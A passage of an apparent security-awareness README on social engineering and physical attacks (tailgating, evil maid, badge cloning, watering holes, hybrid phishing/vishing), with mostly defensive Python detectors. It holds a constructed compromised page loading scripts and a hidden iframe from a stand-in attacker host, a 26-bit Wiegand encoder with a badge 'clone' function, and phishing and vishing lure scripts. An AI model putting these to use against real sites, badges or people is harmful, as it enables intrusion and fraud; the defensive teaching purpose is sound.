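def analyze(text, max_open_seconds=20):
    """Return Findings: several people on one badge read (TAILGATE), an entry
    read while that badge is already inside (ANTIPASSBACK), a door held open
    longer than max_open_seconds (DOOR_HELD) and passage with no read at all
    (NO_BADGE: a propped or forced door)."""
    findings = []
    inside = set()     # badges currently believed to be inside
    sessions = {}      # door -> state of the current open cycle
    for ts, door, event, badge in parse_log(text):
        if event == "BADGE_IN":
            if badge in inside:
                findings.append(Finding(
                    "ANTIPASSBACK", door, badge, ts,
                    "entry read while already inside: credential shared, "
                    "cloned, or holder left by tailgating out"))
            inside.add(badge)
            sessions[door] = {"badge": badge, "opened_at": None,
                              "passes": 0, "started": ts}
        elif event == "BADGE_OUT":
            inside.discard(badge)
        elif event == "DOOR_OPEN":
            _session(sessions, door, ts)["opened_at"] = ts
        elif event == "PASS":
            _session(sessions, door, ts)["passes"] += 1
        elif event == "DOOR_CLOSE":
            s = sessions.pop(door, None)
            if s is None:
                continue
            if s["badge"] and s["passes"] > 1:
                findings.append(Finding(
                    "TAILGATE", door, s["badge"], s["started"],
                    f"{s['passes']} people passed on one badge read"))
            if not s["badge"] and s["passes"] > 0:
                findings.append(Finding(
                    "NO_BADGE", door, "", s["started"],
                    f"{s['passes']} people passed with no badge read"))
            if s["opened_at"] is not None:
                held = (ts - s["opened_at"]).total_seconds()
                if held > max_open_seconds:
                    findings.append(Finding(
                        "DOOR_HELD", door, s["badge"], s["opened_at"],
                        f"door open for {held:.0f}s"))
    return findings


if __name__ == "__main__":
    for f in analyze(SAMPLE_LOG):
        print(f"{f.when:%H:%M:%S} {f.kind:<12} {f.door:<8} {f.badge or '-':<6} {f.detail}")
```

Anti-passback only works if exits are badged too; on sites where the exit is a free push bar, the "inside" set drifts and that rule has to be dropped, which is why the people-counter rule (PASS events) is the more reliable of the two.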

Shoulder Surfing - Watching Someone Enter PINs/Passwords

Shoulder surfing is a social engineering technique where an attacker observes a victim entering sensitive information, such as PINs, passwords, or credit card details. The attacker uses this information for malicious purposes, often in public places like cafes, ATMs, or airports. This technique can also be employed remotely using surveillance tools.

Examples

1. ATM Shoulder Surfing

  • Scenario:
    An individual is using an ATM to withdraw money. The attacker stands close behind them, casually observing while the victim types in their PIN.
  • How the Attack Happens:
    The attacker memorizes the PIN or records it discreetly using a phone or camera. Later, they use the captured PIN for unauthorized transactions.

2. Public Wi-Fi or Cafes

  • Scenario:
    A person logs into their online banking account while sitting in a crowded cafe. The attacker, seated nearby, watches over their shoulder.
  • How the Attack Happens:
    The attacker notes down the victim's username and password as they type them on their device. The attacker may later use these credentials to access the victim's accounts.

3. Smartphone Shoulder Surfing

  • Scenario:
    A victim is entering their phone's unlock PIN or password in a subway or on a crowded bus. The attacker is close by, watching their screen.
  • How the Attack Happens:
    The attacker memorizes the PIN/password or secretly records it using a camera. The attacker may use this to access the victim's sensitive apps, such as banking or email.

4. ATM "Shoulder Surfing" with Hidden Cameras

  • Scenario:
    A criminal installs a hidden camera near an ATM to record users' PIN entries.
  • How the Attack Happens:
    The attacker collects video recordings of users entering their PINs, which are later used for financial fraud.

5. Credit Card Shoulder Surfing

  • Scenario:
    A shopper enters their PIN at the point of sale terminal in a crowded store. The attacker stands in line behind them and peeks over their shoulder.
  • How the Attack Happens:
    The attacker memorizes the credit card PIN and later uses it for unauthorized purchases or withdrawals.

Dumpster Diving: Retrieving Info from Physical Trash

What is Dumpster Diving?

Dumpster diving in cybersecurity refers to the practice of searching through discarded materials, such as trash, recycling, or discarded electronics, to recover sensitive data that can be used for malicious purposes. Attackers sift through physical trash to find valuable information, including personal and business data, passwords, financial details, and much more.

Common Information Retrieved in Dumpster Diving:

  1. Personal Documents:

    • Receipts, bank statements, utility bills, etc.
    • Example: A discarded bank statement containing an account number or other sensitive details that can be used for identity theft.
  2. Passwords:

    • Written or printed passwords.
    • Example: A sticky note with a password like "Password123" found in a trash bin.
  3. Business Documents:

    • Internal memos, meeting notes, or business cards.
    • Example: A memo listing employee access codes or confidential business strategies.
  4. Old Hardware:

    • Computers, phones, or hard drives that may still contain data.
    • Example: A discarded hard drive containing sensitive company files, client data, or login credentials.
  5. Receipts or Invoices:

    • Documents containing transaction details, credit card numbers, etc.
    • Example: A receipt with the full card number of a company’s corporate credit card.
  6. Internal Reports or Contracts:

    • Example: Discarded contract papers with details about a company’s operations, intellectual property, or confidential deals.
  7. Discarded Storage Media:

    • CD/DVDs, flash drives, old SD cards.
    • Example: A USB drive with unencrypted documents containing customer data or internal databases.
  8. Old Identity Documents:

    • Passports, driver’s licenses, or ID cards.
    • Example: A discarded expired driver’s license that could be used for social engineering.

Examples of Dumpster Diving Attacks:

  1. Example 1: Identity Theft

    • Scenario: An attacker finds a company’s employee payroll list in a dumpster. Using this information, the attacker impersonates an employee to gain access to company systems or steal funds.
  2. Example 2: Phishing / Social Engineering

    • Scenario: An attacker finds a discarded business card that has a company’s email and phone number. The attacker calls the company, impersonating a client, and gathers additional sensitive information from unassuming employees.
  3. Example 3: Espionage / Data Breach

    • Scenario: An attacker retrieves a trash bag from a company's trash can, which contains confidential project plans. They use this information to sell it to a competitor or leak it publicly.
  4. Example 4: Social Engineering / Account Takeover

    • Scenario: A hacker finds old documents with bank account details or login credentials in the trash. They use this information to initiate fraudulent activity on the accounts.
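Discarded hardware and storage media are the items in the list above that a checklist cannot fix: the only defense is to verify that the drive is actually empty before it leaves the building. The script below is an added example for this README (not code from the repository) that scans a disk image for residual data: it counts blocks that still hold non-zero bytes and searches for recognisable secrets (Luhn-valid card numbers, e-mail addresses). The image is a constructed byte string; on a real drive you would read the block device or a dd image in chunks. The zero-block check assumes a zero-fill wipe; after a random overwrite or a cryptographic erase, rely on the string scan instead.

```python
"""Check a disk image for residual data before the drive is disposed of.

Added example for this README, not code from the original repository.
IMAGE is a constructed, tiny "disk image": two zero blocks, one block with
a leftover invoice, then zeros.
"""
import re

IMAGE = (bytes(1024)
         + b"INVOICE 1234567890123456 for alice@example.com "
           b"paid with card 4111111111111111\n"
         + bytes(2048))

PAN_RE = re.compile(rb"(?<!\d)(\d{13,19})(?!\d)")
EMAIL_RE = re.compile(rb"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")


def luhn_ok(digits: str) -> bool:
    """Luhn checksum used by payment card numbers; filters out random digit runs
    such as order numbers."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:                      # double every second digit from the right
            d = d * 2 - 9 if d > 4 else d * 2
        total += d
    return total % 10 == 0


def scan_image(image: bytes, block_size: int = 512) -> dict:
    """Count blocks that still contain non-zero data and look for recognisable
    secrets (Luhn-valid card numbers, e-mail addresses)."""
    nonzero = 0
    total = 0
    for off in range(0, len(image), block_size):
        total += 1
        if any(image[off:off + block_size]):   # any byte other than 0x00
            nonzero += 1
    pans = [m.group(1).decode() for m in PAN_RE.finditer(image)
            if luhn_ok(m.group(1).decode())]
    emails = [m.group(0).decode() for m in EMAIL_RE.finditer(image)]
    return {"blocks": total, "nonzero_blocks": nonzero,
            "pans": pans, "emails": emails}


def is_sanitized(report: dict) -> bool:
    """True only if nothing survives: no live blocks and no recognisable data."""
    return (report["nonzero_blocks"] == 0
            and not report["pans"] and not report["emails"])


if __name__ == "__main__":
    r = scan_image(IMAGE)
    print(f"{r['nonzero_blocks']}/{r['blocks']} blocks hold data; "
          f"cards={r['pans']} emails={r['emails']}; sanitized={is_sanitized(r)}")
```

Note that the order number 1234567890123456 is 16 digits but fails the Luhn check, so it is not reported; the test card number 4111111111111111 passes and is. For SSDs and drives with wear-levelling, a host-side scan only sees the logical blocks, so the vendor's secure-erase or physical destruction remains the authoritative step; this check catches the common failure where a drive was simply never wiped.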

Impersonation (On-site) – Cybersecurity Social Engineering Technique

Description

Impersonation (On-site) is a social engineering technique where an attacker pretends to be a trusted individual, such as an IT technician, maintenance worker, or delivery personnel, to gain unauthorized access to secure areas, devices, or sensitive information. This method exploits the trust placed in legitimate personnel roles to manipulate individuals into revealing confidential data, granting physical access to restricted areas, or assisting the attacker in other ways.


Examples

1. Pretending to be IT Support

  • Scenario:
    An attacker visits an office building and claims to be a new IT support technician. They state that they need access to computers for "routine system updates" or "security patches." Employees, trusting the persona, allow them to plug in a USB device or hand over their unlocked machines.
  • Goal:
    Gain unauthorized access to the system or install malicious software (e.g., keyloggers, malware).

2. Maintenance Worker

  • Scenario:
    The attacker impersonates a maintenance worker responsible for repairing equipment such as photocopiers or HVAC systems. They claim they need to access restricted areas for inspections or repairs. The attacker then uses this opportunity to access sensitive documents or networked devices.
  • Goal:
    Access restricted areas or sensitive documents left unattended by employees.

3. Delivery Personnel

  • Scenario:
    The attacker poses as a delivery person, claiming to be delivering a package or equipment. They may have a fake invoice or tracking number to appear legitimate. Employees often trust the attacker and grant access to secure areas to "deliver" the package.
  • Goal:
    Plant malicious devices (e.g., USB drives) or steal physical documents.

4. Cleaning Crew or Janitor

  • Scenario:
    An attacker impersonates a member of the cleaning crew, entering the building after hours to exploit the lack of supervision. They may access unattended computers, desks, or documents.
  • Goal:
    Gather sensitive information, photograph documents, or steal equipment.

5. Fake Auditor

  • Scenario:
    An attacker impersonates an auditor or compliance officer, claiming that they need to inspect areas or data for regulatory purposes. They may request passwords or other sensitive information under the guise of compliance auditing.
  • Goal:
    Extract sensitive business data or financial information.

Evil Maid Attack – Tampering with Unattended Devices

An Evil Maid Attack is a physical-access attack in which an attacker gets brief, unsupervised access to an unattended device (e.g., a laptop in a hotel room) and tampers with it so they can later read its data or regain access. The name comes from the idea that anyone with temporary physical access, such as hotel housekeeping, could carry it out while the owner is away; it was coined by Joanna Rutkowska in 2009 for an attack on TrueCrypt’s pre-boot authentication. The attack matters precisely because full-disk encryption is in use: the data at rest is unreadable, so the attacker goes after the code that runs before the disk is unlocked, or after the key itself.

Common Techniques in Evil Maid Attacks:

  1. Hardware Keylogger Installation
    An attacker can plant a keylogger that silently records keystrokes, capturing the disk passphrase and login credentials. On a desktop this is an inline USB or PS/2 device; on a laptop the internal keyboard is not on a detachable cable, so the attacker must open the case or fall back on a firmware or bootloader implant (technique 2).

    Example:
    A victim leaves their laptop unattended in a hotel room, and an attacker plants a keylogger that records the passphrase when the owner returns and unlocks the machine.

  2. Modifying the Boot Loader or Firmware
    With full-disk encryption, the bootloader (and the firmware that loads it) is the one piece of code that runs before the disk is unlocked, and on many setups it sits unencrypted and unsigned. The attacker replaces it with a version that records the passphrase at the next boot and stores it on disk or sends it out; the original 2009 proof of concept did exactly this against TrueCrypt. Firmware settings can also be changed, e.g., enabling boot from USB or disabling Secure Boot, so that the attacker’s own media runs first.

    Example:
    The attacker boots the victim’s laptop from a USB stick, overwrites the bootloader in the unencrypted boot partition with a passphrase-logging version, and comes back later to collect the captured passphrase.

  3. Installing a Backdoor
    If the disk is unencrypted, or the attacker already captured the passphrase on a previous visit, they can install a backdoor to gain remote access at any time.

    Example:
    The attacker installs a Remote Access Trojan (RAT) on the victim’s laptop, enabling them to control the device remotely over the network.

  4. Attacking Disk Encryption Setups
    The attacker cannot switch off BitLocker or FileVault without the key, but weak configurations leak it. BitLocker in its default TPM-only mode unlocks the volume automatically during boot, so an attacker who can boot the machine reaches the login screen with the disk already open, and the key has been extracted in that state with DMA and TPM-bus sniffing attacks; a pre-boot PIN closes that gap. A copied disk image can also be attacked offline if the passphrase is weak.

    Example:
    The attacker images the encrypted drive with a bootable USB stick, then brute-forces a short passphrase offline, or captures the passphrase with technique 2 and decrypts the image.

  5. Bootable USB Stick against an Unencrypted Disk
    If the disk is not encrypted, the attacker can boot the victim’s device from a live USB stick, bypass the operating system’s login entirely, and read or modify anything on the disk.

    Example:
    The attacker boots from a USB stick, copies documents and browser credential stores, resets a local account password, and reboots the machine so that nothing looks different to the owner.

Controls: never leave the device unattended where a stranger can reach it; enable Secure Boot and set a firmware (BIOS/UEFI) password; use TPM-backed encryption with a pre-boot PIN; keep a baseline of the unencrypted boot partition and compare it after travel; power devices fully off rather than suspending them, since a suspended machine keeps the encryption key in RAM.
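The bootloader swap described above is detectable after the fact because the unencrypted boot partition is small and changes rarely. The script below is an added example for this README (not code from the repository): it hashes every file under a boot directory, keeps the result as a baseline, and reports anything added, removed or modified. The demo builds a throwaway /boot-like tree in a temporary directory and simulates the attacker swapping the bootloader. It assumes the baseline is stored off the device (or signed) and that the check runs from a trusted environment such as a known-good live USB; it cannot see firmware implants, which need TPM-measured boot to catch.

```python
"""Detect tampering with the unencrypted boot partition after a device was left unattended.

Added example for this README, not code from the original repository. The boot
tree built in demo() is constructed; on a real machine point snapshot() at the
mounted boot partition (e.g. /boot) from a trusted boot environment.
"""
import hashlib
import tempfile
from pathlib import Path


def snapshot(root: Path) -> dict:
    """Map each file (POSIX-style relative path) under root to its SHA-256."""
    manifest = {}
    for path in sorted(root.rglob("*")):
        if path.is_file():
            digest = hashlib.sha256(path.read_bytes()).hexdigest()
            manifest[path.relative_to(root).as_posix()] = digest
    return manifest


def compare(baseline: dict, current: dict) -> dict:
    """Diff two manifests; any non-empty list means the boot chain changed."""
    return {
        "added": sorted(set(current) - set(baseline)),
        "removed": sorted(set(baseline) - set(current)),
        "modified": sorted(p for p in baseline
                           if p in current and baseline[p] != current[p]),
    }


def demo() -> dict:
    """Simulate the attack on a constructed boot tree and return the diff."""
    with tempfile.TemporaryDirectory() as tmp:
        boot = Path(tmp) / "boot"
        (boot / "EFI" / "BOOT").mkdir(parents=True)
        (boot / "EFI" / "BOOT" / "BOOTX64.EFI").write_bytes(b"legitimate bootloader")
        (boot / "vmlinuz").write_bytes(b"kernel image")
        (boot / "initrd.img").write_bytes(b"initramfs")
        baseline = snapshot(boot)          # taken before the trip, stored off-device

        # Evil maid: replace the bootloader with one that logs the passphrase
        # and drop an extra module; the kernel and initrd are untouched.
        (boot / "EFI" / "BOOT" / "BOOTX64.EFI").write_bytes(b"trojanised bootloader")
        (boot / "EFI" / "BOOT" / "keylog.efi").write_bytes(b"passphrase-capturing implant")

        return compare(baseline, snapshot(boot))


if __name__ == "__main__":
    for kind, paths in demo().items():
        print(f"{kind:<9} {paths}")
```

A legitimate OS update also changes these files, so the check is useful as "did anything change while I was not updating?" rather than as a blind alarm; refresh the baseline right after each update, from the same trusted environment.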


Badge Cloning / Fake IDs – Gaining Access via Fake Credentials

🚨 Overview

Badge cloning and fake IDs are techniques that allow attackers to gain unauthorized physical access to secure areas by using forged credentials or cloned access badges. This method exploits gaps in physical security, particularly in organizations whose entry control relies on older low-frequency RFID cards (125 kHz HID Prox, EM4100 and similar) that simply broadcast a static ID with no authentication, or on visual inspection of an ID card that nobody checks closely.

🧠 How It Works

1. Cloning RFID Badges

RFID-enabled access badges are commonly used in organizations for physical access control. An attacker can clone a badge using specialized RFID readers and writers (a Proxmark3 or Flipper Zero, or a concealed long-range reader). By copying the identifier stored on a legitimate badge onto a writable blank, they create a cloned badge that the door controller cannot distinguish from the original. This works against low-frequency cards, which emit a fixed bit pattern whenever a reader energizes them; credentials with mutual authentication (e.g., HID SEOS, MIFARE DESFire EV2/EV3) do not yield a cloneable ID to a passive read and must be attacked differently.

  • Example: An attacker uses a reader hidden in a bag to capture an employee’s badge ID while the employee sits in a café with the badge on a lanyard. Later, the attacker writes the captured bits to a blank card and uses it to enter the company’s restricted server room.
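To see why the capture-and-replay above works, it helps to look at what a low-frequency badge actually transmits. The block below is an added example for this README (not code from the repository) that implements the common HID H10301 layout, better known as 26-bit Wiegand: one even-parity bit, an 8-bit facility code, a 16-bit card number and one odd-parity bit. Everything the reader checks is in those 26 static bits, so a reader that captured them has exactly what a writer (for instance a Proxmark3 writing a T5577 blank) needs to produce a working clone. The facility code and card number used in the demo are made up.

```python
"""Why a low-frequency proximity badge is trivially cloned: the credential is
26 static bits with two parity bits and no authentication.

Added example for this README, not code from the original repository.
Implements the HID H10301 (26-bit Wiegand) frame layout.
"""


def encode_h10301(facility: int, card: int) -> str:
    """Return the 26-bit string a badge emits for this facility code and card number."""
    if not 0 <= facility < 2**8 or not 0 <= card < 2**16:
        raise ValueError("facility code must be 8-bit, card number 16-bit")
    data = f"{facility:08b}{card:016b}"              # 24 payload bits
    left, right = data[:12], data[12:]
    even_parity = str(left.count("1") % 2)            # first 13 bits have even weight
    odd_parity = str((right.count("1") + 1) % 2)      # last 13 bits have odd weight
    return even_parity + data + odd_parity


def decode_h10301(bits: str) -> tuple:
    """Parse a captured 26-bit frame; reject bad length or parity."""
    if len(bits) != 26 or set(bits) - {"0", "1"}:
        raise ValueError("not a 26-bit frame")
    data = bits[1:25]
    left, right = data[:12], data[12:]
    if int(bits[0]) != left.count("1") % 2:
        raise ValueError("even parity check failed")
    if int(bits[25]) != (right.count("1") + 1) % 2:
        raise ValueError("odd parity check failed")
    return int(data[:8], 2), int(data[8:], 2)


def clone(captured_bits: str) -> str:
    """What a cloned badge emits: exactly the captured bits. Nothing in the frame
    ties it to the original card, so the reader cannot tell the two apart."""
    facility, card = decode_h10301(captured_bits)      # validates the capture
    return encode_h10301(facility, card)


def brute_force_space(facility_known: bool) -> int:
    """Frames an attacker must try when no card could be captured: once the
    facility code is known (it is shared by every card on site), only the
    16-bit card number is left to guess."""
    return 2**16 if facility_known else 2**24


if __name__ == "__main__":
    frame = encode_h10301(123, 45678)
    print(frame, decode_h10301(frame), clone(frame) == frame, brute_force_space(True))
```

The parity bits are an integrity check against read errors, not a security feature; an attacker re-computes them for free. The small card-number space also means that, given one valid badge, guessing neighbouring card numbers from the same batch is feasible, which is why controllers should flag a burst of failed reads at one door as an attack and not as a broken reader.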

2. Creating Fake IDs

In this technique, attackers forge an identification card that mimics an employee’s or visitor's legitimate credentials. The attacker can print, laminate, and assemble a fake badge that looks indistinguishable from the original.

  • Example: The attacker creates a fake delivery person badge with the company logo, photo of an employee, and other details to gain access to the company premises.

3. Social Engineering for Fake ID Creation

Sometimes, attackers use social engineering to gather the necessary details to create fake IDs. They might impersonate an internal staff member, like HR or IT, and convince others to provide employee photos or information under false pretenses.

  • Example: An attacker posing as an IT technician contacts the HR department and requests an employee photo to "update" their internal systems, later using this photo to create a forged ID.

🌍 Real-World Example

In a well-known case, a security researcher used a fake contractor badge to gain access to an office building. The researcher was able to bypass the building's physical security measures by following legitimate employees into restricted areas, such as server rooms, and walking around without suspicion. The fake contractor badge was nearly identical to real badges issued by the company, allowing the attacker to pass security checkpoints.

  • Tactics Used:
    • Creation of a fake contractor badge with the company logo and employee photo.
    • “Tailgating” – following an authorized employee into a secure building using the fake badge.
    • Gaining access to restricted areas, including high-value zones like server rooms.

Watering Hole Attack - Cybersecurity Social Engineering Technique

Description

A Watering Hole Attack is a social engineering technique in which an attacker compromises a website that is frequently visited by their target audience. By infecting the website with malicious content, the attacker aims to exploit vulnerabilities in the visitors' systems and steal sensitive information or infect their devices with malware.

The term "watering hole" comes from predators waiting near a water source to capture prey when they come to drink. Similarly, attackers wait for their targets to visit compromised websites and exploit them once they do.


Example 1: Targeting an Organization

Scenario:

An attacker targets a company by compromising a popular industry-related news website that the company's employees regularly visit.

Steps:

  1. The attacker gains control over the website (via an unpatched CMS or plugin, stolen administrator credentials, SQL injection, or by compromising a third-party script the site loads).
  2. They inject malicious code (JavaScript, malware, etc.) into the site to exploit vulnerabilities in employees' browsers or software.
  3. Employees visit the website, and upon loading the compromised page, they unknowingly download malware.
  4. The attacker gains access to sensitive company data, credentials, or internal systems.
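Step 2 is what the site owner can watch for: an injected `<script>` tag pointing at an attacker host, or an inline script that was not there yesterday. The block below is an added example for this README (not code from the repository) that compares a page’s scripts against a known-good baseline: external scripts must come from an allow-listed host, and inline scripts must hash to a known value. The two HTML documents are constructed and `attacker.invalid` uses a reserved TLD. In practice the live page would be fetched on a schedule and the baseline kept in version control; pinning third-party scripts with Subresource Integrity is a complementary control, not something this check replaces.

```python
"""Spot a watering-hole injection: compare a page's scripts against a baseline.

Added example for this README, not code from the original repository.
BASELINE_HTML and COMPROMISED_HTML are constructed.
"""
import hashlib
from html.parser import HTMLParser
from urllib.parse import urlparse

ALLOWED_HOSTS = {"www.example.com", "cdn.example.com"}

BASELINE_HTML = """<html><head>
<script src="https://cdn.example.com/js/app.js"></script>
<script>window.dataLayer = window.dataLayer || [];</script>
</head><body><h1>Industry News</h1></body></html>"""

# Same page after compromise: a remote loader and an inline hidden-iframe dropper.
COMPROMISED_HTML = """<html><head>
<script src="https://cdn.example.com/js/app.js"></script>
<script>window.dataLayer = window.dataLayer || [];</script>
<script src="https://attacker.invalid/l.js"></script>
<script>document.write('<iframe src="https://attacker.invalid/ek/" width=0 height=0></iframe>');</script>
</head><body><h1>Industry News</h1></body></html>"""


class ScriptCollector(HTMLParser):
    """Collect external script URLs and inline script bodies."""
    def __init__(self):
        super().__init__()
        self.external, self.inline = [], []
        self._buf = None

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "script":
            src = dict(attrs).get("src")
            if src:
                self.external.append(src)
            else:
                self._buf = []

    def handle_data(self, data):
        if self._buf is not None:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag.lower() == "script" and self._buf is not None:
            self.inline.append("".join(self._buf).strip())
            self._buf = None


def collect(html: str) -> ScriptCollector:
    parser = ScriptCollector()
    parser.feed(html)
    parser.close()
    return parser


def inline_hashes(html: str) -> set:
    """Baseline: SHA-256 of every inline script on the known-good page."""
    return {hashlib.sha256(b.encode()).hexdigest() for b in collect(html).inline}


def audit(html: str, allowed_hosts: set, allowed_inline: set) -> list:
    """Return (kind, detail) for scripts not in the baseline: external scripts
    from unknown hosts and inline scripts with an unknown hash. Relative src
    values are same-origin and treated as allowed."""
    parser = collect(html)
    findings = []
    for src in parser.external:
        host = urlparse(src).netloc.lower()
        if host and host not in allowed_hosts:
            findings.append(("external-script", src))
    for body in parser.inline:
        digest = hashlib.sha256(body.encode()).hexdigest()
        if digest not in allowed_inline:
            findings.append(("inline-script", body[:60]))
    return findings


if __name__ == "__main__":
    baseline = inline_hashes(BASELINE_HTML)
    for kind, detail in audit(COMPROMISED_HTML, ALLOWED_HOSTS, baseline):
        print(kind, detail)
```

The same check misses an attacker who modifies `app.js` on the allow-listed CDN rather than the page, which is the third-party-script case from step 1; for that, hash the fetched script bodies as well, or serve them with `integrity` attributes.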

Real-World Example:

In 2013, an iOS developer forum (iPhoneDevSDK) was compromised to serve a Java zero-day exploit to visitors; developers at Facebook, Apple and Twitter were among those whose workstations were infected. The site was chosen because the targets’ engineers were known to visit it.


Example 2: Targeting Individuals in a Specific Industry

Scenario:

An attacker targets individuals working in the finance industry by compromising a trusted financial community website.

Steps:

  1. The attacker compromises the website, exploiting vulnerabilities in its platform or injecting malicious code.
  2. They use this to inject malware into the page, such as a JavaScript payload designed to exploit browser vulnerabilities.
  3. When financial professionals visit the site, their systems become infected.
  4. The attacker gains access to sensitive financial data or login credentials.

Real-World Example:

In early 2017, the website of the Polish Financial Supervision Authority (KNF) was compromised to serve malware to visitors coming from IP ranges belonging to banks; employees of several Polish banks were infected, and related activity was reported against financial institutions in other countries. The campaign was attributed to the Lazarus group.


Example 3: Political Targeting

Scenario:

An attacker targets journalists or activists visiting political news websites.

Steps:

  1. The attacker infects the website with malicious content designed to exploit a browser or plugin vulnerability.
  2. Journalists visit the site, and their systems are infected without their knowledge.
  3. The attacker steals sensitive political information, such as drafts or confidential sources.

Real-World Example:

In 2013, the website of the Central Tibetan Administration (tibet.net) was compromised so that visitors to its Chinese-language pages were redirected to a Java exploit, a watering hole aimed at people following Tibetan political affairs. Similar compromises of Tibetan and Uyghur activist sites were reported throughout that period.


Reverse Social Engineering

Description:

Reverse social engineering involves the attacker inducing the victim to ask for help. The attacker sets up a scenario where the victim feels compelled to seek help from them, either by phone, email, or in-person. This is a manipulative technique that takes advantage of trust and authority to exploit the victim’s need for assistance.

How it Works:

  1. Create a Problem (Usually Fabricated): The attacker creates a scenario where the victim believes they have a serious problem (e.g., system failure, account breach).
  2. Offer Assistance: The attacker presents themselves as a trusted source of help (e.g., IT support, customer service).
  3. Induce Contact: The attacker encourages the victim to reach out to them for assistance.
  4. Victim Contacts the Attacker: The victim reaches out, handing over information that the attacker uses for malicious purposes.

Examples of Reverse Social Engineering:

1. Fake IT Support Scenario

  • Attackers’ Actions:
    The attacker sends an email or calls the victim claiming that they’ve detected a security issue on the victim’s device or network. They provide a contact number or email for the victim to reach out to for assistance.

    Example Message:
    “Our monitoring system has flagged unusual activity on your network. Please contact IT support at [phone number] immediately to resolve this issue. Failure to act may result in data loss.”

  • Victim’s Actions:
    The victim, believing this warning is legitimate, calls the number and provides details about their system, potentially revealing credentials or allowing remote access to the attacker.


2. Malware Infection Scenario

  • Attackers’ Actions:
    The attacker deliberately infects the victim’s system with malware that causes errors or system failure. The attacker then leaves a phone number or website for "technical support."

    Example Message:
    “Your system has been compromised. Please call [phone number] to speak with an expert who can resolve the issue immediately.”

  • Victim’s Actions:
    The victim contacts the attacker and, thinking they’re calling for help, ends up handing over control of their system to the attacker, potentially leading to data theft or further exploitation.


3. Fake Account Recovery

  • Attackers’ Actions:
    The attacker targets a user’s social media or bank account and, through phishing or social engineering, gets the victim to believe their account has been compromised. They then offer to help recover it by pretending to be a support agent.

    Example Message:
    “We noticed suspicious activity on your account. Call us at [phone number] to verify your identity and recover your account.”

  • Victim’s Actions:
    The victim contacts the attacker, provides personal details, and allows the attacker to "help" them recover access to their account. The attacker might then hijack the account.


4. Fake Product or Service Support

  • Attackers’ Actions:
    The attacker creates a fake customer service center, often posing as a representative of a popular product or service. The attacker might leave fake contact details on a website or through a phishing email.

    Example Message:
    “Hello, we’ve detected a problem with your recent order. Please contact us at [email/phone] so we can assist you with a refund or replacement.”

  • Victim’s Actions:
    The victim, thinking they're resolving a legitimate issue, contacts the attacker and may be tricked into providing sensitive personal information or payment details.


5. Fake Social Engineering Attack

  • Attackers’ Actions:
    The attacker tricks the victim into thinking they’ve fallen victim to a social engineering attack (e.g., phishing). The attacker then offers to help “secure” the victim’s information.

    Example Message:
    “It appears your email was compromised due to a phishing attack. Please contact us immediately at [phone number] for a free security check-up.”

  • Victim’s Actions:
    The victim reaches out, unknowingly handing over login credentials or allowing the attacker to access sensitive accounts.


Hybrid Attacks: Blending Phishing with Vishing

Description:

A hybrid attack combines phishing (online social engineering) and vishing (voice-based social engineering). The attacker uses a multi-step approach to gain trust by combining online deception with direct phone-based manipulation. The goal is to exploit the victim’s trust using both mediums.


Example 1: "Check Your Email I Just Sent"

  • Step 1 (Phishing Email): The attacker sends a well-crafted phishing email posing as the victim's bank or a legitimate service they use. The email urges the victim to click on a fraudulent link.

Subject: Urgent Action Required: Security Alert on Your Account

Body:
Dear [Victim Name],
We've noticed unusual activity on your account. Please check the attached message for important updates regarding your account security. Click the link to verify your details and avoid account suspension.
(Link leads to a phishing website mimicking the bank's official website)

  • Step 2 (Vishing Follow-Up): After the victim clicks on the link, the attacker calls the victim pretending to be from the bank, asking them for sensitive information.

Phone Call: "Hello, this is [Fake Bank Representative] from [Victim’s Bank]. I see you recently tried to verify your account information online but the system flagged your request. Can you confirm your full name, address, and social security number for verification purposes to protect your account?"

  • Outcome: The victim unknowingly provides sensitive information to the attacker.

Example 2: "System Update Notice"

  • Step 1 (Phishing Email): The attacker sends a phishing email pretending to be IT Support, asking the victim to download a malicious attachment for a system update.

Subject: System Update Alert: Action Required

Body:
Dear [Victim Name],
We need to update your system security. Please download the attached file to continue the update. This is a required update to keep your system running securely.
(Attachment is a malicious file)

  • Step 2 (Vishing Follow-Up): Once the victim opens the file (which infects their system with malware), the attacker calls pretending to be IT support, asking for login credentials.

Phone Call: "Hi [Victim Name], this is [Fake IT Staff]. I noticed you’ve initiated the system update. We’ve flagged your system for unusual activity. Could you please confirm your login credentials so we can proceed with the update?"

  • Outcome: The victim discloses sensitive login credentials.

Example 3: "Prize Winner Notification"

  • Step 1 (Phishing Email): The attacker sends a phishing email claiming the victim has won a prize, asking them to fill out a form.

Subject: Congratulations! You've Won a $1,000 Gift Card!

Body:
Dear [Victim Name],
You've won a $1,000 gift card! To claim your prize, click here and fill out a quick survey to confirm your shipping address.
(Link leads to a phishing form asking for personal details)

  • Step 2 (Vishing Follow-Up): After the victim submits their details, the attacker calls pretending to be a representative of the prize company, asking for credit card details to finalize the prize shipment.

Phone Call: "Hi [Victim Name], this is [Fake Representative] from [Prize Company]. We received your claim for the $1,000 gift card. However, we need to confirm your credit card number to finalize shipping. Can you provide that now?"

  • Outcome: The victim provides credit card information.
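The e-mail half of these hybrid attacks is the part that can be triaged automatically before the follow-up call lands. The block below is an added example for this README (not code from the repository) that parses a message and flags the inconsistencies visible in the Example 1 lure: a Reply-To domain that differs from the sender, link text that names one site while the href goes to another, a sender that mails links to a domain it does not own, and urgency language. Both messages are constructed and use reserved domains (.example, .invalid). The registrable-domain helper is a naive last-two-labels approximation (wrong for co.uk-style suffixes); production code would use the Public Suffix List.

```python
"""Triage the e-mail half of a hybrid phishing/vishing attack.

Added example for this README, not code from the original repository.
PHISH and BENIGN are constructed messages on reserved domains.
"""
import re
from email import message_from_bytes, policy
from email.utils import parseaddr
from html.parser import HTMLParser
from urllib.parse import urlparse

URGENCY = ("urgent", "immediately", "within 24 hours", "suspension", "suspended")
HOST_IN_TEXT = re.compile(r"(?:https?://)?([a-z0-9.-]+\.[a-z]{2,})", re.I)

PHISH = b"""From: "Example Bank Security" <alerts@examplebank.example>
Reply-To: support@examplebank-verify.invalid
To: victim@example.org
Subject: Urgent Action Required: Security Alert on Your Account
Content-Type: text/html; charset=utf-8

<html><body>
<p>Dear Customer, we noticed unusual activity on your account.</p>
<p>Please <a href="https://examplebank-verify.invalid/login">verify your details at
https://www.examplebank.example</a> within 24 hours to avoid account suspension.</p>
</body></html>
"""

BENIGN = b"""From: "Example Bank" <alerts@examplebank.example>
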